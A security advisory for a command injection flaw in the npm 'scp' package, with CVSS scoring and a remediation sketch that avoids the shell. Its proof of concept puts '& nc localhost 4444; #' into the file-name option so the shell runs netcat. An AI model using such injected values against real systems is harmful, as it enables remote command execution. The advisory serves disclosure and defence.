Arbitrary Command Injection

Affecting scp package, ALL versions


Overview

Affected versions of this package are vulnerable to Arbitrary Command Injection. The issue occurs because user input is interpolated into a command string that is then executed without any checks.

PoC By Snyk Security Team

var scp = require('scp');

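var options = {
    // The file value goes into the command string unchecked, so the shell
    // interprets its metacharacters instead of treating it as a file name.
    file: '& nc localhost 4444; #',
    user: 'username',
    host: 'myServer',
    port: '20',
    path: '~'
};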

scp.send(options, function (err) {
    if (err) console.log(err);
    else console.log('File transferred.');
});

Remediation

There is no fixed version for scp.
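
With no fixed release available, callers have to keep option values away from a shell themselves. The sketch below is an added example, not code from Snyk or from the scp package: it validates the same option fields the PoC uses and runs the system `scp` binary through `execFile` with an argument array. The names `buildScpArgs` and `send` and the allow-list patterns are assumptions made for illustration.

```javascript
const { execFile } = require('child_process');

// Assumed allow-lists for this sketch; tighten them for your environment.
const HOST_RE = /^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$/;
const USER_RE = /^[A-Za-z_][A-Za-z0-9_.-]*$/;
// The remote path may still be expanded by the remote shell (legacy scp
// protocol), so it gets a strict character set as well.
const REMOTE_PATH_RE = /^[A-Za-z0-9_.~\/-]+$/;

// Hypothetical helper: validate options and return an argv array for scp.
function buildScpArgs(options) {
  const { file, user, host, path } = options;
  const port = Number(options.port === undefined ? 22 : options.port);
  if (!Number.isInteger(port) || port < 1 || port > 65535) {
    throw new Error('invalid port');
  }
  if (typeof host !== 'string' || !HOST_RE.test(host)) {
    throw new Error('invalid host');
  }
  if (typeof user !== 'string' || !USER_RE.test(user)) {
    throw new Error('invalid user');
  }
  if (typeof path !== 'string' || !REMOTE_PATH_RE.test(path)) {
    throw new Error('invalid path');
  }
  if (typeof file !== 'string' || file === '' || /[\0\r\n]/.test(file)) {
    throw new Error('invalid file');
  }
  // Prefixing "./" stops scp from reading a relative name as an option
  // (leading "-") or as a remote "host:path" spec (embedded ":").
  const local = file.startsWith('/') ? file : './' + file;
  return ['-P', String(port), '--', local, `${user}@${host}:${path}`];
}

// Hypothetical replacement for a send() that builds a command string.
function send(options, callback) {
  let args;
  try {
    args = buildScpArgs(options);
  } catch (err) {
    return callback(err);
  }
  // execFile hands args to the scp binary directly; no shell parses them.
  execFile('scp', args, (err) => callback(err || null));
}
```

Given the PoC's options, the `file` value reaches `scp` as one literal argument, so the transfer fails with a missing-file error and nothing else is executed.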

CVSS Score

8.3 (high severity)

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Unchanged
  • Confidentiality: High
  • Integrity: High
  • Availability: Low

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L

Credit: Mik317
CWE: CWE-78
Snyk ID: SNYK-JS-SCP-1009828
Disclosed: 07 May, 2020
Published: 21 Jun, 2020